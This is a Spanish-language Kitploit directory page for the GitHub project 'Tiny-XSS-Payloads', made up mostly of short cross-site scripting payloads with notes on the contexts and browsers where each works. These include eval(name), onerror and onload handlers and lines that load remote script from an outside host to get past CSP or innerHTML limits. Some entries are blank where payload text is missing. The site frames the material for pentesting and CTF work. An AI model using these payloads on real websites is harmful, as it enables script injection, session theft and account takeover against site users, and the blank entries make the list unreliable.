Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Tiny-XSS-Payloads — Una colección de pequeños payloads XSS que se pueden usar en diferentes contextos. https://tinyxss.terjanq.me | Kitploit
Herramientas/GitHubGitHub/terjanq/tiny-xss-payloads
Generación de PayloadsSeguridad WebCTFRecursos Curados
GitHubterjanq/tiny-xss-payloads

Tiny-XSS-Payloads

Una colección de pequeños payloads XSS que se pueden usar en diferentes contextos. https://tinyxss.terjanq.me

Ver Repositorio
2.4k218hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Tiny-XSS-Payloads

Una colección de cargas útiles XSS cortas que se pueden usar en diferentes contextos.

La DEMO disponible aquí: https://tinyxss.terjanq.me

Cargas útiles actuales

root@kitploit:~
<!-- Requiere que se inserte un script relativo en el DOM después del sumidero,
  p. ej. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
root@kitploit:~
<!-- Solo funciona como XSS reflejado -->
<svg/onload=eval(name)>
root@kitploit:~
<!-- Si controlas la URL -->
<svg/onload=eval(`'`+URL)>
root@kitploit:~
<!-- Si controlas el nombre, pero unsafe-eval no está habilitado -->
<svg/onload=location=name>
root@kitploit:~
<!-- En Chrome, también funciona dentro de innerHTML, incluso en elementos aún no insertados en el DOM -->
<svg><svg/onload=eval(name)>
root@kitploit:~
<!-- Si controlas el nombre de la ventana, esta carga útil funcionará dentro de innerHTML, incluso en elementos aún no insertados en el DOM -->
<audio/src/onerror=eval(name)>
root@kitploit:~
<!-- Si controlas la URL, esta carga útil funcionará dentro de innerHTML, incluso en elementos aún no insertados en el DOM -->

root@kitploit:~
<!-- Solo un script casual -->
<script/src=//NJ.₨></script>
root@kitploit:~
<!-- Si controlas el nombre de la ventana -->

root@kitploit:~
<!-- Si controlas la URL -->

root@kitploit:~
<!-- Si el número de iframes en la página es constante -->

root@kitploit:~
<!-- Solo para Firefox -->
<script/href=//NJ.₨ />">
root@kitploit:~
<!-- Si el número de iframes en la página es aleatorio -->

root@kitploit:~
<!-- Si unsafe-inline está deshabilitado en CSP y se permiten scripts externos -->
</script>">
root@kitploit:~
<!-- Si se permiten estilos en línea -->
<style/onload=eval(name)>
root@kitploit:~
<!-- Si se permiten estilos en línea y la URL se puede controlar -->
<style/onload=eval(`'`+URL)>
root@kitploit:~
<!-- Si los estilos en línea están bloqueados -->
<style/onerror=eval(name)>
root@kitploit:~
<!-- Usa un script externo como importación, no funciona en innerHTML -->
<!-- El PoC solo funciona en https y Chrome, porque NJ.₨ verifica el encabezado Sec-Fetch-Dest -->
<svg/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Usa un script externo como importación, se activa si los estilos en línea están permitidos.
<!-- El PoC solo funciona en https y Chrome, porque NJ.₨ verifica el encabezado Sec-Fetch-Dest -->
<style/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- Usa un script externo como importación -->
<!-- El PoC solo funciona en https y Chrome, porque NJ.₨ verifica el encabezado Sec-Fetch-Dest -->

Obsoletos:

root@kitploit:~
<!-- Si controlas la URL, solo Safari -->

root@kitploit:~
<!-- Si los estilos en línea están permitidos, solo Safari -->
<style/onload=write(URL)>
Descargar herramienta